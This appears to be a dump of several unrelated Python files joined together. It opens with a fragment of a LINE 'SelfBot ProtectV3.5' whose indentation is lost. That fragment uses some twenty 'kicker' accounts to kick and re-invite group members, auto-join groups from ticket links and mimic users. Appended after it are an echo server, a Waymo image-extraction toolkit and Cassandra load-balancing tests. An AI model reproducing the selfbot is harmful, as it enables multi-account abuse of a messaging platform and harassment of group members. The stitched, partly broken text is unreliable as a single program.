kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
pass
return
#==============================================================================================================
#==============================================[OP TYPE 22 24 JOIN]============================================
#==============================================================================================================
if op.type == 55:
if op.param2 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
if op.type == 25:
msg = op.message
text = str(msg.text)
msg_id = msg.id
receiver = msg.to
sender = msg._from
to = sender if not msg.toType and sender != myMid else receiver
txt = text.lower()
cmd = command(text)
setKey = settings['setKey']['key'] if settings['setKey']['status'] else ''
if text in tmp_text:
return tmp_text.remove(text)
if msg.contentType == 0: # Content type is text
if '/ti/g/' in text and settings['autoJoin']['ticket']:
regex = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = regex.findall(text)
tickets = []
gids = line.getGroupIdsJoined()
for link in links:
if link not in tickets:
tickets.append(link)
for ticket in tickets:
try:
group = line.findGroupByTicket(ticket)
except:
continue
if group.id in gids:
line.sendMessage(to, 'เข้าร่วมกลุ่ม' + group.name)
continue
line.acceptGroupInvitationByTicket(group.id, ticket)
if settings['autoJoin']['reply']:
if '@!' not in settings['autoJoin']['message']:
line.sendMessage(to, settings['autoJoin']['message'])
else:
line.sendMentionV2(to, settings['autoJoin']['message'], [sender])
line.sendMessage(to, 'เข้าร่วมกลุ่ม' + group.name)
try:
executeCmd(msg, text, txt, cmd, msg_id, receiver, sender, to, setKey)
except TalkException as talk_error:
logError(talk_error)
if talk_error.code in [7, 8, 20]:
sys.exit(1)
line.sendMessage(to, 'เกิดข้อผิดพลาด\n' + str(talk_error))
time.sleep(3)
except Exception as error:
logError(error)
line.sendMessage(to, 'เกิดข้อผิดพลาด\n' + str(error))
time.sleep(3)
elif msg.contentType == 1: # Content type is image
if settings['changePictureProfile']:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/picture.jpg')
line.updateProfilePicture(path)
line.sendMessage(to, 'เปลี่ยนรูปโปรไฟล์เรียบร้อย')
settings['changePictureProfile'] = False
elif settings['changeCoverProfile']:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/cover.jpg')
line.updateProfileCover(path)
line.sendMessage(to, 'เปลี่ยนรูปปกเรียบร้อย')
settings['changeCoverProfile'] = False
elif to in settings['changeGroupPicture'] and msg.toType == 2:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/grouppicture.jpg')
line.updateGroupPicture(to, path)
line.sendMessage(to, 'เปลี่ยนรูปกลุ่มแล้ว')
settings['changeGroupPicture'].remove(to)
elif msg.contentType == 7: # Content type is sticker
if settings['checkSticker']:
res = '╭───「 Sticker Info 」'
res += '\n├ Sticker ID : ' + msg.contentMetadata['STKID']
res += '\n├ Sticker Packages ID : ' + msg.contentMetadata['STKPKGID']
res += '\n├ Sticker Version : ' + msg.contentMetadata['STKVER']
res += '\n├ Sticker Link : line://shop/detail/' + msg.contentMetadata['STKPKGID']
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, parsingRes(res))
elif msg.contentType == 13: # Content type is contact
if settings['checkContact']:
mid = msg.contentMetadata['mid']
try:
contact = line.getContact(mid)
except:
return line.sendMessage(to, 'เกิดข้ผิดพลาดเฉียบพลัน ' + mid)
res = '╭───「 Details Contact 」'
res += '\n├ MID : ' + mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV3.5」'
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, parsingRes(res))
elif msg.contentType == 16: # Content type is album/note
if settings['checkPost']:
if msg.contentMetadata['serviceType'] in ['GB', 'NT', 'MH']:
if msg.contentMetadata['serviceType'] in ['GB', 'NT']:
contact = line.getContact(sender)
author = contact.displayName
else:
author = msg.contentMetadata['serviceName']
posturl = msg.contentMetadata['postEndUrl']
res = '╭───「 Details Post 」'
res += '\n├ Creator : ' + author
res += '\n├ Post Link : ' + posturl
res += '\n╰───「SelfBot ProtectV3.5」'
elif op.type == 26:
msg = op.message
text = str(msg.text)
msg_id = msg.id
receiver = msg.to
sender = msg._from
to = sender if not msg.toType and sender != myMid else receiver
txt = text.lower()
if settings['autoRead']:
kicker.sendChatChecked(to, msg_id)
kicker2.sendChatChecked(to, msg_id)
kicker3.sendChatChecked(to, msg_id)
kicker4.sendChatChecked(to, msg_id)
kicker5.sendChatChecked(to, msg_id)
kicker6.sendChatChecked(to, msg_id)
kicker7.sendChatChecked(to, msg_id)
kicker8.sendChatChecked(to, msg_id)
kicker9.sendChatChecked(to, msg_id)
kicker10.sendChatChecked(to, msg_id)
kicker11.sendChatChecked(to, msg_id)
kicker12.sendChatChecked(to, msg_id)
kicker13.sendChatChecked(to, msg_id)
kicker14.sendChatChecked(to, msg_id)
kicker15.sendChatChecked(to, msg_id)
kicker16.sendChatChecked(to, msg_id)
kicker17.sendChatChecked(to, msg_id)
kicker18.sendChatChecked(to, msg_id)
kicker19.sendChatChecked(to, msg_id)
kicker20.sendChatChecked(to, msg_id)
g1.sendChatChecked(to, msg_id)
if msg.contentType == 0: # Content type is text
if '/ti/g/' in text and settings['autoJoin']['ticket']:
regex = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = regex.findall(text)
tickets = []
gids = line.getGroupIdsJoined()
for link in links:
if link not in tickets:
tickets.append(link)
for ticket in tickets:
try:
group = line.findGroupByTicket(ticket)
except:
continue
if group.id in gids:
line.sendMessage(to, 'I\'m aleady on group ' + group.name)
continue
line.acceptGroupInvitationByTicket(group.id, ticket)
if settings['autoJoin']['reply']:
if '@!' not in settings['autoJoin']['message']:
line.sendMessage(to, settings['autoJoin']['message'])
else:
line.sendMentionV2(to, settings['autoJoin']['message'], [sender])
line.sendMessage(to, 'Success join to group ' + group.name)
if settings['mimic']['status']:
if sender in settings['mimic']['target'] and settings['mimic']['target'][sender]:
try:
line.sendMessage(to, text, msg.contentMetadata)
tmp_text.append(text)
except:
pass
if settings['autoRespondMention']['status']:
if msg.toType in [1, 2] and 'MENTION' in msg.contentMetadata.keys() and sender != myMid and msg.contentType not in [6, 7, 9]:
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = [mention['M'] for mention in mentions['MENTIONEES']]
if myMid in mentionees:
if line.getProfile().displayName in text:
if '@!' not in settings['autoRespondMention']['message']:
line.sendMessage(to, settings['autoRespondMention']['message'])
else:
line.sendMentionV2(to, settings['autoRespondMention']['message'], [sender])
if settings['autoRespond']['status']:
if msg.toType == 0:
contact = line.getContact(sender)
if contact.attributes != 32 and 'MENTION' not in msg.contentMetadata.keys():
if '@!' not in settings['autoRespond']['message']:
line.sendMessage(to, settings['autoRespond']['message'])
else:
line.sendMentionV2(to, settings['autoRespond']['message'], [sender])
if op.type == 55:
if op.param1 in lurking:
if lurking[op.param1]['status'] and op.param2 not in lurking[op.param1]['members']:
lurking[op.param1]['members'].append(op.param2)
if lurking[op.param1]['reply']['status']:
if '@!' not in lurking[op.param1]['reply']['message']:
line.sendMessage(op.param1, lurking[op.param1]['reply']['message'])
else:
line.sendMentionV2(op.param1, lurking[op.param1]['reply']['message'], [op.param2])
except TalkException as talk_error:
logError(talk_error)
if talk_error.code in [7, 8, 20]:
sys.exit(1)
except KeyboardInterrupt:
sys.exit('##---- KEYBOARD INTERRUPT -----##')
except Exception as error:
logError(error)
# Main polling loop: fetch up to 80 operations per long-poll and dispatch each
# one to executeOp on its own daemon thread so a slow handler cannot stall
# the poller.
while True:
    try:
        ops = oepoll.singleTrace(count=80)
        if ops is not None:
            for op in ops:
                # Advance the revision first so a crash in the handler does
                # not make us re-fetch (and re-handle) the same operation.
                oepoll.setRevision(op.revision)
                thread1 = threading.Thread(target=executeOp, args=(op,))
                thread1.daemon = True
                thread1.start()
    except Exception as error:
        # The original swallowed every error with `pass`, hiding outages.
        # Log it (same convention as the executeOp error path) and keep polling.
        logError(error)
|
threadecho.py | # A simple echo server with threads
from socket import *
from threading import Thread
def echo_server(addr):
    """Listen on *addr* and serve each client with a daemon echo thread."""
    listener = socket(AF_INET, SOCK_STREAM)
    # Allow immediate restarts while old sockets linger in TIME_WAIT.
    listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    listener.bind(addr)
    listener.listen(5)
    while True:
        conn, peer = listener.accept()
        Thread(target=echo_handler, args=(conn, peer), daemon=True).start()
def echo_handler(client, addr):
    """Echo every chunk received on *client* back to the peer until EOF."""
    print('Connection from', addr)
    # Disable Nagle so small echoes go out without coalescing delay.
    client.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
    with client:
        # recv() returns b'' at EOF, which is the iter() sentinel here.
        for chunk in iter(lambda: client.recv(100000), b''):
            client.sendall(chunk)
    print('Connection closed')
if __name__ == '__main__':
    # Serve on all interfaces, port 25000, until interrupted.
    echo_server(('',25000))
|
util_image_label.py | """
Taken and Customized from:
https://github.com/KushalBKusram/WaymoDataToolkit
"""
import os
import cv2
import threading
import sys
import shutil
import tensorflow.compat.v1 as tf
tf.enable_eager_execution()
from google.protobuf.json_format import MessageToDict
from waymo_open_dataset import dataset_pb2 as open_dataset
class ToolKit:
    """Extract FRONT-camera images and labels from Waymo Open Dataset segments.

    Taken and customized from:
    https://github.com/KushalBKusram/WaymoDataToolkit

    Reads ``.tfrecord`` segment files from ``training_dir`` and writes decoded
    images, per-frame label files, and per-segment statistics under
    ``save_dir``/camera.

    NOTE(review): ``save_dir`` must be a usable path string; passing the
    default ``None`` raises ``TypeError`` in ``__init__`` (unchanged from the
    original behaviour).
    """

    def __init__(self, training_dir=None, testing_dir=None, validation_dir=None, save_dir=None):
        self.segment = None        # current segment file name
        self.seg = None            # short segment id parsed from the file name
        self.last_frame = None     # last segment id recorded as containing a pedestrian
        self.seg_number = 1        # 1-based index used to name output "video" dirs
        self.training_dir = training_dir
        self.testing_dir = testing_dir
        self.validation_dir = validation_dir
        self.save_dir = save_dir
        self.camera_dir = self.save_dir + "/camera"
        self.camera_images_dir = self.camera_dir + "/images"
        self.camera_labels_dir = self.camera_dir + "/labels"
        # exist_ok avoids the check-then-create race of the original
        # os.path.exists() + os.makedirs() pairs.
        os.makedirs(self.camera_dir, exist_ok=True)
        os.makedirs(self.camera_images_dir, exist_ok=True)
        os.makedirs(self.camera_labels_dir, exist_ok=True)
        # self.camera_list = ["UNKNOWN", "FRONT", "FRONT_LEFT", "FRONT_RIGHT", "SIDE_LEFT", "SIDE_RIGHT"]
        self.camera_list = ["FRONT"]  # Customized: only the FRONT camera
        self.img_vid_path = ''
        self.lbl_vid_path = ''

    def assign_segment(self, segment, seg_num):
        """Point the toolkit at *segment* and prepare its output directories."""
        self.segment = segment
        # Drop the leading 8 characters — presumably the 'segment-' prefix;
        # TODO confirm against actual segment file naming.
        self.seg = segment.split('_')[0][8:]
        self.seg_number = seg_num
        self.dataset = tf.data.TFRecordDataset("{}/{}".format(self.training_dir, self.segment), compression_type='')
        vid_path1 = "{}/{}".format(self.camera_images_dir, self.get_vid_num())
        self.prepare_path(vid_path1)
        self.img_vid_path = vid_path1
        vid_path2 = "{}/{}".format(self.camera_labels_dir, self.get_vid_num())
        self.prepare_path(vid_path2)
        self.lbl_vid_path = vid_path2

    def list_training_segments(self):
        """Return the ``.tfrecord`` segment file names found in training_dir."""
        return [f for f in os.listdir(self.training_dir) if f.endswith(".tfrecord")]

    def list_testing_segments(self):
        # Not implemented upstream either; kept for interface parity.
        pass

    def list_validation_segments(self):
        # Not implemented upstream either; kept for interface parity.
        pass

    def get_vid_num(self):
        """Return the output directory name for the current segment, e.g. 'video_0001'."""
        return 'video_' + "%04.f" % self.seg_number

    #########################################################################
    # Extract Camera Images and Labels
    #########################################################################

    def extract_image(self, ndx, frame):
        """Decode and save the FRONT camera image of *frame* as ``<ndx>.png``."""
        for index, data in enumerate(frame.images):
            if index == 0 and data.name == 1:  # Customized: (0 & 1) select FRONT
                decodedImage = tf.io.decode_jpeg(data.image, channels=3, dct_method='INTEGER_ACCURATE')
                # TF decodes RGB; OpenCV writes BGR, so convert before imwrite.
                decodedImage = cv2.cvtColor(decodedImage.numpy(), cv2.COLOR_RGB2BGR)
                file_name = "%05.f.png" % ndx
                cv2.imwrite("{}/{}".format(self.img_vid_path, file_name), decodedImage)

    def extract_labels(self, ndx, frame):
        """Write the FRONT-camera 2D box labels of frame *ndx* to a text file.

        One CSV line per label: type, centerX, centerY, length, width, id.
        Also appends the segment id to ``ped_frames_file.txt`` the first time a
        pedestrian is seen in this segment.
        """
        for index, data in enumerate(frame.camera_labels):
            if index == 0 and data.name == 1:  # Customized: FRONT only
                camera = MessageToDict(data)
                with open("{}/{}_{}.txt".format(self.lbl_vid_path, self.seg, ndx), "w") as label_file:
                    # A frame may carry no "labels" key at all; treat as empty
                    # instead of the original bare except that also hid real bugs.
                    for label in camera.get("labels", []):
                        x = label["box"]["centerX"]
                        y = label["box"]["centerY"]
                        width = label["box"]["width"]
                        length = label["box"]["length"]
                        obj_type = label["type"]
                        obj_id = label["id"]
                        label_file.write("{},{},{},{},{},{}\n".format(obj_type, x, y, length, width, obj_id))
                        if self.last_frame != self.seg and obj_type == 'TYPE_PEDESTRIAN':
                            self.last_frame = self.seg
                            # BUG FIX: the original chained open().write().close().
                            # write() returns an int, so .close() raised
                            # AttributeError — swallowed by the bare except, but it
                            # aborted the remaining labels of the frame.
                            with open("{}/camera/ped_frames_file.txt".format(self.save_dir), 'a+') as ped_file:
                                ped_file.write("{} \n".format(self.seg))

    # Implemented Extraction as Threads
    def threaded_camera_image_extraction(self, datasetAsList, range_value):
        """Worker: parse and extract every frame index in *range_value*."""
        frame = open_dataset.Frame()
        for frameIdx in range_value:
            frame.ParseFromString(datasetAsList[frameIdx])
            self.extract_image(frameIdx, frame)
            self.extract_labels(frameIdx, frame)

    # Function to call to extract images
    def extract_camera_images(self):
        """Extract images and labels for every frame of the current segment."""
        # Record which segment we are processing; the original leaked this handle.
        with open("{}/camera/last_file.txt".format(self.save_dir), 'w+') as last_file:
            last_file.write(self.segment)
        # Convert tfrecord to a list so frames can be indexed by worker threads.
        datasetAsList = list(self.dataset.as_numpy_iterator())
        totalFrames = len(datasetAsList)
        threads = []
        for chunk in self.batch(range(totalFrames), 30):
            t = threading.Thread(target=self.threaded_camera_image_extraction, args=[datasetAsList, chunk])
            t.start()
            threads.append(t)
        for thread in threads:
            thread.join()

    #########################################################################
    # Consolidate Object Count per Camera and frontal_velocity, weather, time and location
    #########################################################################

    def consolidate(self):
        """Write per-frame object counts + velocity/weather/time/location CSV."""
        os.makedirs("{}/consolidation".format(self.save_dir), exist_ok=True)
        # Convert tfrecord to a list
        datasetAsList = list(self.dataset.as_numpy_iterator())
        totalFrames = len(datasetAsList)
        frame = open_dataset.Frame()
        # Column order of each per-camera count block.
        type_index = {
            "TYPE_UNKNOWN": 0,
            "TYPE_VEHICLE": 1,
            "TYPE_PEDESTRIAN": 2,
            "TYPE_SIGN": 3,
            "TYPE_CYCLIST": 4,
        }
        camera_order = ("FRONT", "FRONT_LEFT", "FRONT_RIGHT", "SIDE_LEFT", "SIDE_RIGHT")
        # The original never closed this file; the with-block fixes that.
        with open("{}/consolidation/{}.csv".format(self.save_dir, self.segment[:-9]), "w") as stat_file:
            for frameIdx in range(totalFrames):
                frame.ParseFromString(datasetAsList[frameIdx])
                counts_by_camera = {}
                for data in frame.camera_labels:
                    counters = [0, 0, 0, 0, 0]
                    camera = MessageToDict(data)
                    for label in camera.get("labels") or []:
                        idx = type_index.get(label["type"])
                        if idx is not None:
                            counters[idx] += 1
                    counts_by_camera[camera["name"]] = counters
                # Cameras absent from this frame contribute no columns,
                # matching the original empty-list behaviour.
                obj_list = []
                for name in camera_order:
                    obj_list += counts_by_camera.get(name, [])
                # determine the velocity (taken from the first/front image)
                velocity = MessageToDict(frame.images[0])
                stat_file.write("{},{},{},{},{}\n".format(','.join([str(obj_count) for obj_count in obj_list]), ','.join([str(vel) for vel in velocity["velocity"].values()]), frame.context.stats.weather, frame.context.stats.time_of_day, frame.context.stats.location))

    #########################################################################
    # Util Functions
    #########################################################################

    def delete_files(self, files):
        """Remove each path in *files*, reporting (not raising) OS errors."""
        for f in files:
            try:
                os.remove(f)
            except OSError as e:
                print("Error: %s : %s" % (f, e.strerror))

    def batch(self, iterable, n=1):
        """Yield successive slices of *iterable* of length at most *n*."""
        l = len(iterable)
        for ndx in range(0, l, n):
            yield iterable[ndx:min(ndx + n, l)]

    def refresh_dir(self, dir):
        """Delete and recreate *dir* (no-op if it does not exist)."""
        if os.path.isdir(dir):
            sys.stdout.write('Preparing Files . . . \r')
            try:
                shutil.rmtree(dir)
                os.makedirs(dir, exist_ok=True)
            except OSError as e:
                print("Error: %s - %s." % (e.filename, e.strerror))

    def prepare_path(self, f_path):
        """Create *f_path* (and parents) if it is missing."""
        if not os.path.exists(f_path):
            os.makedirs(f_path)
|
test_policies.py | # Copyright 2013-2014 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
from itertools import islice, cycle
from mock import Mock
from random import randint
import six
import sys
import struct
from threading import Thread
from cassandra import ConsistencyLevel
from cassandra.cluster import Cluster
from cassandra.metadata import Metadata
from cassandra.policies import (RoundRobinPolicy, DCAwareRoundRobinPolicy,
TokenAwarePolicy, SimpleConvictionPolicy,
HostDistance, ExponentialReconnectionPolicy,
RetryPolicy, WriteType,
DowngradingConsistencyRetryPolicy, ConstantReconnectionPolicy,
LoadBalancingPolicy, ConvictionPolicy, ReconnectionPolicy, FallthroughRetryPolicy)
from cassandra.pool import Host
from cassandra.query import Statement
from six.moves import xrange
class TestLoadBalancingPolicy(unittest.TestCase):
    """Checks on the abstract LoadBalancingPolicy base class."""

    def test_non_implemented(self):
        """Every operation on the interface-style base class must raise."""
        policy = LoadBalancingPolicy()
        host = Host("ip1", SimpleConvictionPolicy)
        host.set_location_info("dc1", "rack1")
        operations = (
            lambda: policy.distance(host),
            lambda: policy.populate(None, host),
            lambda: policy.make_query_plan(),
            lambda: policy.on_up(host),
            lambda: policy.on_down(host),
            lambda: policy.on_add(host),
            lambda: policy.on_remove(host),
        )
        for operation in operations:
            self.assertRaises(NotImplementedError, operation)

    def test_instance_check(self):
        """Passing the policy class rather than an instance is a TypeError."""
        self.assertRaises(TypeError, Cluster, load_balancing_policy=RoundRobinPolicy)
class TestRoundRobinPolicy(unittest.TestCase):
    """Tests for RoundRobinPolicy: plans cover all live hosts and survive
    concurrent use and host status changes."""

    def test_basic(self):
        """A query plan covers every populated host exactly once."""
        hosts = [0, 1, 2, 3]
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)
        qplan = list(policy.make_query_plan())
        self.assertEqual(sorted(qplan), hosts)

    def test_multiple_query_plans(self):
        """Each plan in a series still covers all hosts."""
        hosts = [0, 1, 2, 3]
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)
        for i in xrange(20):
            qplan = list(policy.make_query_plan())
            self.assertEqual(sorted(qplan), hosts)

    def test_single_host(self):
        """A one-host cluster yields a one-host plan."""
        policy = RoundRobinPolicy()
        policy.populate(None, [0])
        qplan = list(policy.make_query_plan())
        self.assertEqual(qplan, [0])

    def test_status_updates(self):
        """Down/removed hosts leave the plan; up/added hosts join it."""
        hosts = [0, 1, 2, 3]
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)
        policy.on_down(0)
        policy.on_remove(1)
        policy.on_up(4)
        policy.on_add(5)
        qplan = list(policy.make_query_plan())
        self.assertEqual(sorted(qplan), [2, 3, 4, 5])

    def test_thread_safety(self):
        # hosts must be a concrete list: on Python 3, range() is a lazy
        # object and never compares equal to the sorted list built below.
        hosts = list(range(100))
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)
        errors = []

        def check_query_plan():
            # Collect failures explicitly: an assertion raised inside a
            # worker thread would otherwise be silently discarded.
            try:
                for i in range(100):
                    qplan = list(policy.make_query_plan())
                    self.assertEqual(sorted(qplan), hosts)
            except Exception as exc:
                errors.append(exc)

        threads = [Thread(target=check_query_plan) for i in range(4)]
        # Explicit loops instead of map(): map() is lazy on Python 3, so
        # map(lambda t: t.start(), threads) never started any thread and
        # the test silently exercised nothing.
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        if errors:
            self.fail("Saw errors: %s" % (errors,))

    def test_thread_safety_during_modification(self):
        hosts = list(range(100))
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)
        errors = []

        def check_query_plan():
            try:
                for i in xrange(100):
                    list(policy.make_query_plan())
            except Exception as exc:
                errors.append(exc)

        def host_up():
            for i in xrange(1000):
                policy.on_up(randint(0, 99))

        def host_down():
            for i in xrange(1000):
                policy.on_down(randint(0, 99))

        threads = []
        for i in range(5):
            threads.append(Thread(target=check_query_plan))
            threads.append(Thread(target=host_up))
            threads.append(Thread(target=host_down))

        # make the GIL switch after every instruction, maximizing
        # the chance of race conditions
        if six.PY2:
            original_interval = sys.getcheckinterval()
        else:
            original_interval = sys.getswitchinterval()
        try:
            if six.PY2:
                sys.setcheckinterval(0)
            else:
                sys.setswitchinterval(0.0001)
            # Explicit loops: the lazy map() calls in the original were
            # never consumed on Python 3, so no thread ever ran here.
            for t in threads:
                t.start()
            for t in threads:
                t.join()
        finally:
            if six.PY2:
                sys.setcheckinterval(original_interval)
            else:
                sys.setswitchinterval(original_interval)
        if errors:
            self.fail("Saw errors: %s" % (errors,))

    def test_no_live_nodes(self):
        """
        Ensure query plan for a downed cluster will execute without errors
        """
        hosts = [0, 1, 2, 3]
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)
        for i in range(4):
            policy.on_down(i)
        qplan = list(policy.make_query_plan())
        self.assertEqual(qplan, [])
class DCAwareRoundRobinPolicyTest(unittest.TestCase):
    """Tests for DCAwareRoundRobinPolicy: hosts in the policy's own DC come
    first in query plans, and remote-DC usage is capped by the
    used_hosts_per_remote_dc setting."""
    def test_no_remote(self):
        """With only local-DC hosts, the plan covers every host."""
        hosts = []
        for i in range(4):
            h = Host(i, SimpleConvictionPolicy)
            h.set_location_info("dc1", "rack1")
            hosts.append(h)
        policy = DCAwareRoundRobinPolicy("dc1")
        policy.populate(None, hosts)
        qplan = list(policy.make_query_plan())
        self.assertEqual(sorted(qplan), sorted(hosts))
    def test_with_remotes(self):
        """Local hosts always precede remotes; remotes are capped per DC."""
        hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
        for h in hosts[:2]:
            h.set_location_info("dc1", "rack1")
        for h in hosts[2:]:
            h.set_location_info("dc2", "rack1")
        local_hosts = set(h for h in hosts if h.datacenter == "dc1")
        remote_hosts = set(h for h in hosts if h.datacenter != "dc1")
        # allow all of the remote hosts to be used
        policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=2)
        policy.populate(Mock(spec=Metadata), hosts)
        qplan = list(policy.make_query_plan())
        self.assertEqual(set(qplan[:2]), local_hosts)
        self.assertEqual(set(qplan[2:]), remote_hosts)
        # allow only one of the remote hosts to be used
        policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
        policy.populate(Mock(spec=Metadata), hosts)
        qplan = list(policy.make_query_plan())
        self.assertEqual(set(qplan[:2]), local_hosts)
        used_remotes = set(qplan[2:])
        self.assertEqual(1, len(used_remotes))
        self.assertIn(qplan[2], remote_hosts)
        # allow no remote hosts to be used
        policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0)
        policy.populate(Mock(spec=Metadata), hosts)
        qplan = list(policy.make_query_plan())
        self.assertEqual(2, len(qplan))
        self.assertEqual(local_hosts, set(qplan))
    def test_get_distance(self):
        """distance() is LOCAL for the policy's DC, REMOTE for known remote
        hosts within the per-DC cap, and IGNORED otherwise."""
        policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0)
        host = Host("ip1", SimpleConvictionPolicy)
        host.set_location_info("dc1", "rack1")
        policy.populate(Mock(spec=Metadata), [host])
        self.assertEqual(policy.distance(host), HostDistance.LOCAL)
        # used_hosts_per_remote_dc is set to 0, so ignore it
        remote_host = Host("ip2", SimpleConvictionPolicy)
        remote_host.set_location_info("dc2", "rack1")
        self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
        # dc2 isn't registered in the policy's live_hosts dict
        policy.used_hosts_per_remote_dc = 1
        self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
        # make sure the policy has both dcs registered
        policy.populate(Mock(spec=Metadata), [host, remote_host])
        self.assertEqual(policy.distance(remote_host), HostDistance.REMOTE)
        # since used_hosts_per_remote_dc is set to 1, only the first
        # remote host in dc2 will be REMOTE, the rest are IGNORED
        second_remote_host = Host("ip3", SimpleConvictionPolicy)
        second_remote_host.set_location_info("dc2", "rack1")
        policy.populate(Mock(spec=Metadata), [host, remote_host, second_remote_host])
        distances = set([policy.distance(remote_host), policy.distance(second_remote_host)])
        self.assertEqual(distances, set([HostDistance.REMOTE, HostDistance.IGNORED]))
    def test_status_updates(self):
        """Host up/down/add/remove events reshape the plan, local DC first."""
        hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
        for h in hosts[:2]:
            h.set_location_info("dc1", "rack1")
        for h in hosts[2:]:
            h.set_location_info("dc2", "rack1")
        policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
        policy.populate(Mock(spec=Metadata), hosts)
        policy.on_down(hosts[0])
        policy.on_remove(hosts[2])
        new_local_host = Host(4, SimpleConvictionPolicy)
        new_local_host.set_location_info("dc1", "rack1")
        policy.on_up(new_local_host)
        new_remote_host = Host(5, SimpleConvictionPolicy)
        new_remote_host.set_location_info("dc9000", "rack1")
        policy.on_add(new_remote_host)
        # we now have two local hosts and two remote hosts in separate dcs
        qplan = list(policy.make_query_plan())
        self.assertEqual(set(qplan[:2]), set([hosts[1], new_local_host]))
        self.assertEqual(set(qplan[2:]), set([hosts[3], new_remote_host]))
        # since we have hosts in dc9000, the distance shouldn't be IGNORED
        self.assertEqual(policy.distance(new_remote_host), HostDistance.REMOTE)
        policy.on_down(new_local_host)
        policy.on_down(hosts[1])
        qplan = list(policy.make_query_plan())
        self.assertEqual(set(qplan), set([hosts[3], new_remote_host]))
        policy.on_down(new_remote_host)
        policy.on_down(hosts[3])
        qplan = list(policy.make_query_plan())
        self.assertEqual(qplan, [])
    def test_no_live_nodes(self):
        """
        Ensure query plan for a downed cluster will execute without errors
        """
